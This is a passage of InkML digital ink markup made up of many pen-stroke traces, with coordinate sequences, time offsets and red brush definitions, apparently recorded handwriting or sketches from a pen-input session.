  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="92911">11521 11418,'141'-31,"-34"-7,-31-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="93057">12374 10958,'157'-67,"-21"-3,-22-14,-16-29</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="93216">13709 10051,'103'-72,"-27"-16,-14-7</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="93409">14526 9324,'44'-22,"-25"9,-19 13,0 0,0 0,3-6,-3 6,0 0,-6-5,6 5</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="93862">14651 9498,'-6'39,"-15"23,-5-2,4 4,8-5,13-8,0-16,-1-31,-8-38,7-54,23-33,22-14,-5 47,-24 38,-45 7,-61-1,-44 20,1 16,-9 5,32 6</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="137965">19830 2270,'11'-25,"-22"12,11 13,0 0,0 0,-39 2,39-2,0 0,-81 33,81-33,-102 54,-23 51,41 57,30 47,26 20,-3 26,10-21,3-33,6-30,-11 7,-7-49,-4-66,19-45,19-23,42-38,24-35,20 22,-11 50,-42 13,-29 17,-33 16,-33-12,-17-8,10-9,-6 17,12-19,-11-31,5-55,6-72,44-2,1 38</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="138476">20278 1631,'22'190,"-25"34,-11-49,7-60,9-48</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="138747">20468 1402,'-5'2,"-62"27,67-29,-132 41,-39-5,15-16,54 2,50 1,29-3</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="139219">20423 2108,'44'-1,"5"-5,-49 6,59-29,-20-12,-30-7,-39-13,-34 37,-10 46,6 32,36 28,31-1,53-3,26-37</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="139397">20810 2267,'21'-4,"2"-12,-23 16,0 0,5-46,-5 46,8-79,6-6,15 18</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="139919">21209 1906,'21'63,"-27"26,-13 0,-1-15,19-42,6-31,22-53,-10-27,2-12,10 28,10 61,2 66,-11 21,-10-14,-11-41,1-32,7-60,1-17,12-7,10 34,-11 51,11 61,-28 25,-15-14</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="140109">21811 1888,'60'118,"-41"18,-27-33,3-78</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="140239">21866 1909,'-15'-136,"-4"36,5 29,19 40</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="140592">22091 1924,'21'76,"-43"-16,-1-33,11-15,20-15,32-32,7-29,-10 0,-5 27,6 57,-5 58,-13 15,-8-12,-22-46,19-40</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="140967">22578 1844,'23'9,"-36"21,13-30,0 0,-34 60,34-60,-44 65,15 14,20-37,14-20,6-40,-7-39,4-5,5 22,3 42,9 70,-18 3,-8-15,11-41,8-25</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="141206">22706 1395,'13'-7,"-7"44,-6-37,0 0,5 97,-5-97,11 156,-4 30,-5-13</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="142137">21533 3377,'16'-4,"-15"-11,-1 15,0 0,0 0,1-11,-1 11,0 0,-3 9,3-9,0 112,24 107,4 43,-15-58,0-73,-2-93,12-55,25-88,11-30,10-3,-27 82,10 75,-10 81,-22 45,-44-20,-43-28,-21-75,-16-63,11-1,41-10</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="142568">22139 3915,'-15'13,"-37"71,52-84,-49 87,17-2,52-11,20-34,23-67,-9-32,-33-33,-13 10,3 37,-4 56,-2 54,-6 24,-5-8,15-33,16-42</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="142909">22590 3871,'-13'7,"-33"46,46-53,-60 55,7-16,37 3,46-14,20-22,6 7,-18-3,-22 0,-30 52,-28-10,-6-37,-1-29</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="143325">22737 3299,'27'58,"-22"82,-24 61,-15-18,16-72,26-31,23-72,21-29,17-47,10-31,-12 52,-8 90,-14 62,-39 67,-46 26,-30-61</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="144141">22003 4734,'-21'8,"-40"14,61-22,-96 55,-20 49,2 41,-3 39,29 4,16-51,15-36,36-43,7-38,28-24,28-21,32-45,2 13,-5 33,-30 44,-46 21,-36 11,-31-27,-15-24,-1-38,20-21,23-22,-8-31,19-2,6 5,18 2</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26:29.675"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#FF0000"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">21017 12146,'0'-62,"-11"-28,-4-40,14-44,-17-15,-10 42,-3 22,16 38,2 18,20 10,17 47,21 24,45 51,-21 14,-38-18,-32-45,-29-32,-43-39,-32-25,10 30,26 53,21 50,14 38,6 17,-3 18,14-25</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="883.0883">20791 12635,'-4'83,"9"22,2-2,-11-27,8-45,-9-33,-20-48,3-57,20-33,13 44,-5 56,19 26,23 9,11 13,5 14,-19 5,-22 9,-41 26,-32-14,-19-11,6-12,23-13,32-6,22 4,34 18,21 10,16 24,-15-5,-14-19,-18-29</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1409.1409">21358 12586,'20'-19,"-14"16,-6 3,0 0,0 0,7 32,-7-32,0 0,-8 91,8-91,-44 129,-7-8,13-26,12-19,12-29,28-36</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2019.2019">21564 12685,'5'-7,"-10"11,5-4,0 0,0 0,10 31,-10-31,0 0,21 82,-21-82,42 86,4-3,3-29,-22-26,-9-35,-4-45,-9-53,-3 3,-5 49,8 50,30 44,16 51,8-13,-16-40,5-42,4-68,-10-50,-14-21,-29 54,-2 43</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="33411.3408">22390 12759,'15'-21,"25"16,-40 5,0 0,60 19,-60-19,73 23,4-24,13-3,30-20,4-13,-29 1,-58 31,-30 5,-19 11,-26 51,-24 1,8-9,29-15,27-30,22-8,29-35,8-36,-14-22,-41 53,-11 30,-20 1,-21-3,-2 1,6 1,16-5</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="33864.3861">23761 12613,'-38'-9,"-45"-5,83 14,-96 13,4 22,41 8,38 8,53 11,40-18,13-27,-4-26,-5-32,-25-24,-56 6,-59 14,-23 9,-4 10</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="34364.4361">24250 12461,'-15'-5,"-42"-9,57 14,-67 10,11 5,21 14,22-4,40 0,34 9,3-14,12 32,-26 0,-47 14,-39-24,-54-20,-25-13</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="35421.5418">23354 12923,'16'4,"-5"3,-11-7,0 0,0 0,0 11,0-11,0 0,-33 40,33-40,-50 65,-11 15,5-5,2-9,-2-25,5-5,20-24,54-41,7 2,11 10,-1 5,5-20,-29 13,-19-4,-17-19,-2 17,7 20,2 10,-11 10,-2 10,-23 16,19-24,19 17,17-2,23-6,11 2,13-5,12 0,-13 0,-37-3</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="36188.6185">21180 13266,'7'-1,"-12"0,5 1,0 0,0 0,-35 1,35-1,0 0,-78 20,78-20,-85 45,14 2,40-8,43-11,40-11,40-11,-3-1,-20 18,-25 32,-32 2,-41-11,-28-16,-20-19,18-19,32-11</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="36529.6526">21246 13598,'54'1,"1"-10,-55 9,37-16,-8-23,-33 0,-11-2,-14 19,-2 25,8 13,-2 23,18 13,8 4,17-29,23-9,1-30,-11-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="37106.7103">21636 13432,'6'-1,"-15"-5,9 6,0 0,0 0,-37-7,37 7,0 0,-63 14,63-14,-48 26,22 33,46-19,24-7,4-22,-2-22,-15-22,-25 5,1 20,-5 19,23 43,-18 27,7-10,-17-12,-14-27,-8-23,-2-37</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="37457.7454">22073 13207,'-88'-69,"42"60,-5 35,26 37,18 35,24 18,16-17,-26-32,5-29,-22-21,-1-21</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="37667.7664">22030 13499,'-6'-5,"-33"-8,39 13,0 0,-83-10,83 10,-74-11,18 8,30 14,33 0,53 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="38052.8049">22156 13463,'-61'2,"10"20,51-22,-33 32,26 19,19-11,17-11,8-29,-5-22,-2-34,-26 1,5 32,12 89,0-8,-18-46</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="38309.8306">22189 13435,'20'26,"11"16,-31-42,59 93,-13-66,-23-118,-18 35,-3-1,-6 18</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="38580.8577">22412 13090,'3'5,"1"13,-4-18,0 0,5 68,-5-68,14 85,5 21,52 183</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="38817.8814">22516 13173,'17'-1,"0"12,-17-11,41 134,-30 43,15-64,-14-98</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="38991.8988">22699 13387,'-2'0,"-22"4,24-4,0 0,-105 8,105-8</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="61477.1471">20196 10684,'-31'-2,"-7"5,38-3,0 0,-39 25,39-25,-34 46,21 40,27 17,40-7,28-27,9-58,10-37,-39-47,-39-28,-51 15,-32 25,-17 23,9 26,15 24</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="61794.1788">20583 10581,'-7'36,"-6"24,13-60,-7 92,-3 19,8-2,-9-24,9-31,0-38</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="62127.2121">20900 10649,'-11'-3,"-4"20,15-17,0 0,11 64,-11-64,15 88,-6-1,-7-17,0-31,-4-33</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="62349.2343">21110 10968,'-77'35,"15"-10,-10-12,6-6,13-19</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="62557.2551">20892 10663,'-10'5,"-25"19,35-24,0 0,-41 30,41-30,-59 34,-12 8</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="63314.3308">17378 10894,'35'-21,"-31"9,-4 12,0 0,0 0,-22-6,22 6,0 0,-68 13,68-13,-106 30,2 15,20 10,57-16,53-10,60-4,47-11,15 12,-16 27,-53 1,-52-9,-70 0,-59-19,-38-12,2-16,40-19</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="64104.4098">16529 10933,'10'-8,"-10"7,0 1,0 0,0 0,-15 16,15-16,0 0,-35 41,35-41,-48 69,7 26,34 4,35-14,44-26,39-28,20-32,-4-35,-59-54,-61-57,-89 33,-53 49,-30 36,20 35</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="64941.4935">18275 11046,'-52'-17,"15"28,37-11,0 0,-23 50,23-50,-13 71,4-5,13-21,5-22,16-23,6-13,27-8,11 30,-2 29,-32 17,-48 3,-23-35,-6-15,15-20,32-20,22-9,38-27,8-10,-47 32,-24 19,-34 8,-22 14,3 25,35 19,39 21,32 5,14-14,2-20,-11-34,-19-47</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="65162.5156">18627 10750,'12'2,"25"51,-37-53,35 88,-8 39,-6-5,-8-21,0-29,-6-37</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="65354.5348">18746 11107,'-43'8,"-8"8,51-16,-58 21,12 2,19-8,29-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="65710.5704">18995 11087,'23'4,"-49"-4,26 0,0 0,-69 12,69-12,-70 26,30 2,26-4,44-1,37-7,25 9,5 7,-28 10,-36 5,-48-13,-44-14,-17-15,22-9</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="65964.5958">19481 11181,'-20'9,"-4"41,24-50,0 0,-9 54,9-54,-2 49,12-16,5-40</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="66115.6109">19352 10979,'6'-14,"8"14,-14 0,0 0,13 7,-13-7</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="66411.6405">19575 11182,'15'63,"7"-14,-14-20,-2-19,-2-21,4-25,10-20,17 10,12 37,14 44,-16 21,-13 10,-26 10</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="207873.7853">2326 6823,'14'49,"-3"56,-5 16,12 15,-3-16,9-17,-14-68,-11-33,-31-31,-37-79,-3-56,30 21,54 31,30 19,25 12,26 39,-3 38,-20 49,-39 28,-51 24,-24-9,17-14,9-41,21 11,26-8,24 26,10 4,1 14,-20-4,-13-28,-10 12,-16-47</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="208265.8245">2937 7496,'77'-26,"-8"-4,-3-12,-14-29,-7 6,-41 10,-25 20,-34 15,-21 35,8 18,26 50,34 5,40-5,38-17,22-27,8-45</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="208729.8709">3629 7236,'-15'-8,"-34"5,49 3,0 0,-52 22,52-22,-29 40,24 13,32 17,22-27,-3-7,-16-38,-4-22,-21-56,-23-26,-4 39,12 33,10 30,1 11,12 36,0 4,6-2,8 12,3-15,-6-3,-5-10</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="209247.9227">4207 7256,'-34'-18,"-35"12,69 6,-82 11,16 25,39 13,44 19,49-20,12-23,-19-51,-26-55,-39-57,-25-52,-21 63,18 61,27 48,14 42,27 82,26 28,1 20,-6-45</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="209501.9481">4964 7082,'-20'-13,"-75"1,95 12,-120-12,23 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="209869.9849">5392 6979,'-29'4,"-44"28,73-32,-66 67,29 14,58-15,56-18,14-45,-14-38,-44-32,-69-30,-30 32,7 19</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="210267.0246">5686 7048,'30'55,"-19"6,-11-61,4 29,-3-26,0-22,2-45,1-9,9-11,-1 30,8 48,27 53,-9 18,-4 7,-15-18,-12-31,2-34</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="210538.0517">5894 6376,'51'-12,"-20"37,-31-25,47 89,-7 56,-14 17,-1-3,-12-35,3-37,-4-47</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="210953.0932">6291 6819,'30'11,"2"52,-32-63,43 91,-7-18,0-44,-8-28,6-47,-18-28,-16 2,7 28,19 39,44 68,13 56,-34-1,-60 5,-74-19,-75-35,-51-28</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="212281.226">1438 8494,'-20'-12,"-65"6,85 6,-123 32,-4-3,36 16,45-6,47-5,55 1,56 6,29 4,19 2,-58 12,-53 2,-59-3,-70-5,-34-26,18-26,39-5</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="212624.2603">1764 8155,'11'-10,"-18"54,7-44,0 121,16 23,15 30,3-36,-2-5,-8-47,1-33</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="212877.2856">2133 8737,'-47'0,"-49"-8,-6 9,20 7,19-25,26 11,31 3</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="213296.3275">2396 8721,'-4'2,"-55"23,59-25,-86 45,20 30,31 2,44-22,36-11,25-47,-18-13,-10-26,-20-41,-16 34,-4 23,1 30,28 41,11 18,-7 8,-5-19</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="213741.372">2930 8741,'-25'-9,"-55"18,80-9,-74 31,19 32,32-7,44 18,34-18,31-14,-5-35,-17-28</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="214090.4069">3085 8278,'-3'46,"12"53,-7 18,-4 40,-3-20,4-17,4-52,-2-31,1-27</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="214426.4405">3285 8735,'-25'21,"-20"18,45-39,-42 49,24-4,26-3,27 0,6-11,6 8,-11-21,-3 15,-17-20</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="214949.4928">3771 8577,'12'-43,"-14"28,2 15,0 0,0 0,-11-4,11 4,0 0,-30 6,30-6</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="215124.5103">3788 9026,'4'0,"-11"-4,7 4,0 0,-25-9,25 9</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="218430.8409">21973 6688,'12'-8,"-6"-8,-6 16,0 0,0 0,9-10,-9 10,0 0,22-9,-22 9,47-17,23 11,1 12,33 22,-5 2,-2 4,-22-5,-27 4,-29-4,-7 20,-12-6,-2 24,0 15,3 2,5 30,5-3,-6-11,-7 40,-4-35,-1 36,6-7,1 8,-3 15,-7 5,-4-15,-2-5,14 27,13 4,3 1,7 21,-7-22,6-10,11 3,0-4,-13-19,-15-7,-3-27,-4 1,-3-17,9-4,-2-14,2-9,-6-39,-6-5,-11-2,-6-9,-14-12,-16 0,0-15,-4 0,2 1,0-5,9 8,13 12,11 2,12-2,0-8,-3-19,-1-7,-7-19,5-25,-1-19,4-41,-3-12,7-30,1-4,1 0,-11-20,7-11,6-5,10 10,7-18,10 10,-15 13,6-22,-14 36,-4-38,-2 24,11 1,-8 13,0-19,-16 30,2 39,7 19,22 51,16 38,22 15,18 34,27 11,11 19,14 17,9 7</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="221515.1493">1826 9673,'0'2,"-4"39,4-41,0 0,5 55,-5-55,12 84,1 0,-1-12,-6-45,-1-18,-1-19,8-33,-8-42,11-25,10 28,15 61,10 30,-1 43,-10 36,-25-2,-19-8,2-37,6-34</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="221864.1842">2403 9810,'2'2,"-23"37,21-39,0 0,-32 57,32-57,-19 80,22-30,22-13,18-42,3-26,-24-35,-20-3,-33 18,-24 24,-7 29,3 17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="222450.2428">2676 9872,'19'64,"-13"13,-6-29,0-10,-1-35,-1-23,0-42,10-22,10 0,17 50,14 26,4 54,-19 26,-15 20,-15-14,-2-40,12-23</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="222656.2634">3331 9909,'-10'2,"-37"-4,47 2,-83 2,18 8,20-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="223072.305">3578 9966,'45'-6,"3"-12,-48 18,41-23,-16-9,-26-21,-34 11,-30 19,-6 22,17 33,22 30,40 17,36-7,44-26,15-15,-20-25,-7-6,-23-22</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="223326.3304">4272 9859,'2'3,"-25"36,23-39,-58 68,-22 18,9-12,41-21,40-17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="223536.3514">4415 10096,'-24'-16,"-54"-14,78 30,-122-39,9-3,32 5,47-2,40 6</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="223906.3884">4436 9986,'27'14,"-14"-10,-13-4,0 0,0 0,26-1,-26 1,0 0,37-5,-37 5,40-23,-10-10,-24-8,-31 1,-15 24,-5 25,14 36,4 18,20 6,40-8,33-25,8-35,17-14</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="224165.4143">4984 9796,'-12'-11,"-43"22,55-11,0 0,-54 36,54-36,-45 66,7 3,42-3,40-13,17-26,8-24,-8-26</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="224390.4368">5141 9847,'-9'27,"12"34,-3-61,22 61,16-19,13-23,-4-32,-8-32,-25-37,-21-8</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="224615.4593">5294 9403,'7'52,"7"44,0 30,18 24,27-3,-4-53,0-63</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="224775.4753">5621 9889,'-51'-6,"-39"-11,11 25,21-7,37 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="225133.5111">5719 9857,'11'4,"-26"18,15-22,0 0,-45 37,45-37,-46 46,25 4,22-29,17-18,19-17,5-16,-8 10,-3 26,7 34,-14 14,-19-14,1-15,-12-32</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="226092.607">5687 9457,'30'21,"7"43,-37-64,33 104,-5 50,-11-10,11-24,0-51,-6-53,4-32,-5-39,8-39,-4 29,7 47,5 32,-16 33,-16 22,-22 1,-19-23,1-22,21-25,18-23,21-24,29-5,25-13,-1-45,-5-22,-36 22,-46 16,-44 15,-13 32,3 30,22 40,23 53,24 52,21 15,29-14,22-39,24-33,-25-54,-14-32,-15-40,-37-8,-20 42,5 33,-2 33,6 17,25-3,8-19,-2-24,0-16,11-13</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="240660.0636">22577 12117,'14'-13,"-3"4,-11 9,0 0,0 0,11-29,-11 29,0 0,3-39,-3 39,-10-45,3-32,2-21,5-21,12-36,4 15,-12 5,0 43,-7-3,-3 28,0 25,3 38,-1 7,-4 20,2 4,7-9,2-11,9 17,4 24,8 7,-6-14,-6-10,-6-25,2-13,-3-36,-5 3,-3-17,-8 11,5 7,-23 9,-22 5,3 32,-6 23,-7 21,8-23,16 2,20 3</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1:05.268"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#FF0000"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1057 9153,'-10'-5,"9"2,1 3,0 0,0 0,1-4,-1 4,0 0,4-3,-4 3,13-3,17 1,-30 2,0 0,56 5,-56-5,93 4,33-15,17 15,0-10,-18 5,-38-4,-39 9,-40-7,-12-3,-35-18,-32-34,2-5,9-4,14 27,31 23,17 17,21 27,46 31,19 18,-5-3,-27-15,-36-21,-30 14,-52-13,-42-5,-16-9,20 2</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1399.1399">5193 9624,'80'2,"27"10,21-7,18 4,33 6,13-10,42-1,17-8,23-2,34-14,11-6,6 4,39-1,-13-3,-4 5,30 0,-15 9,-21-3,23 1,-23 3,0 9,19 0,-25 5,-23 0,24 3,-17 3,-10 6,24 1,-44-7,5-1,2-6,29 9,-9 5,1-1,21 2,-17-6,-11 3,30 2,-22 0,-7-10,18 14,-9 4,-7 6,25-7,-14-5,-15-9,23 1,-19-6,-21-14,11-6,-20 4,-22 18,21-8,-37 8,-31-2,-7 6</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3194.3194">23526 8997,'2'-3,"-5"-2,3 5,0 0,0 0,-18-7,18 7,0 0,-36 2,36-2,-44 12,-2-6,17 16,24-4,26 5,21-14,7 16,-4 5,-14 18,-32-1,-12-18,-34-4,-18-22,-1-12,27 12</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3564.3564">23680 9206,'41'5,"3"-20,-44 15,44-26,-19-11,-28-13,-36 16,-24 9,12 33,8 51,29 25,37 1,35-29,25-8,-1-40,-2-31</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3822.3822">23966 8494,'12'8,"-3"77,-9-85,15 121,-5 80,6-18,6-22,3-48,-4-72</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4016.4016">24195 9048,'-72'3,"-15"-6,-13-12,25 41,22 1,-6 25</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4591.4591">23300 10327,'14'-3,"5"-39,-19 42,0 0,10-51,-10 51,4-87,2-13,2 2,-4 30,5 22,2 43,17 40,9 40,-2 13,5-42,-7-31,1-30,2-58,-7-35,-13-43,-24 73,-1 49</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="5033.5033">23873 9608,'0'30,"-6"61,6-91,-13 102,-18-2,2-18,9-21,17-33,1-24,1-8</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="5365.5365">24088 10173,'-7'-42,"-45"-20,52 62,-68-96,-6 2,4 21,21 13,15 14,1 4,17 19,13 5</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="5644.5644">24513 9891,'-12'-25,"-50"-8,62 33,-72-31,-9 10,8 24,34-2</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="5838.5838">24449 9972,'36'20,"-51"-18,15-2,0 0,0 0,-48-7,48 7,0 0,-85-35,85 35,-74-7,23 10,22 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="6126.6126">24802 9509,'2'-1,"3"47,-5-46,14 105,-13 1,-17 58,-10-69,6-11,18-53</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="6318.6318">24929 10197,'-20'44,"-21"-31,41-13,-67-8,-24-4,26 10,32-4</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="6553.6553">24780 9468,'-25'-3,"-16"40,41-37,-67 35,-24 15,0 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="22655.2653">4370 2974,'-6'69,"13"40,9 18,-3 20,-9-22,-2-15,-7-57,5-35</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="22862.286">4861 3487,'-39'-19,"-47"0,86 19,-111-23,41 12,34 2</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="23135.3133">4820 2962,'-8'28,"-3"51,11-79,11 123,21 48,8-30,-20-38,-19-30,-1-47</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="23553.3551">5356 3512,'34'-3,"-58"-9,24 12,0 0,-81-28,81 28,-105-6,49 17,36 49,46 4,31-11,18-34,-8-37,3-23,-19-19,-29 34,-9 29,10 46,-2 23,3-19,-14-12,11-35</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="23778.3776">5922 3734,'11'-2,"-17"-30,6 32,0 0,7-64,-7 64,17-66,19 10,24 33,27 19</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="24231.4229">6570 3582,'0'1,"-56"-8,56 7,-99-11,3 14,39 34,56 31,50 1,42-27,20-28,-24-56,-32-56,-20-70,-68-8,-21 15,11 48,26 64,19 50,32 75,19 80,5 13,-12 0,-8-73,-7-46</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="24682.468">6931 3494,'80'78,"-32"-5,-9-14,-4-31,-8-27,7-43,-24-23,-22-29,-7 49,36 49,55 67,-10 21,27-11,-14-36,-18-38,-6-44,-26-28,-22-21,5 18,22 25</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="25083.5081">8072 3526,'-8'5,"-33"12,41-17,0 0,-47 48,47-48,-33 58,35 9,40-31,-8-27,0-45,-2-34,-3 4,-12 43,14 32,4 44,-22 11,-4-16,-19-21,7-18,14-26</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="25339.5337">8526 3859,'37'20,"-41"-29,4 9,0 0,-37-63,37 63,-44-87,12-16,21 13,21 25,33 31,3 40</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="25647.5645">8721 3619,'60'23,"21"-11,4-29,-21-35,-43-23,-46-7,-61 11,4 37,14 62,47 55,54 36,71 6,23 3,-10-36</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="26854.6852">4238 7533,'10'-15,"-31"5,21 10,0 0,-58-9,58 9,-100 16,3 18,34 21,35-3,41-3,40-23,27-3,22 4,-6 7,-21 25,-35 18,-54-3,-56-21,-52-19,-5-37,67-6</inkml:trace>
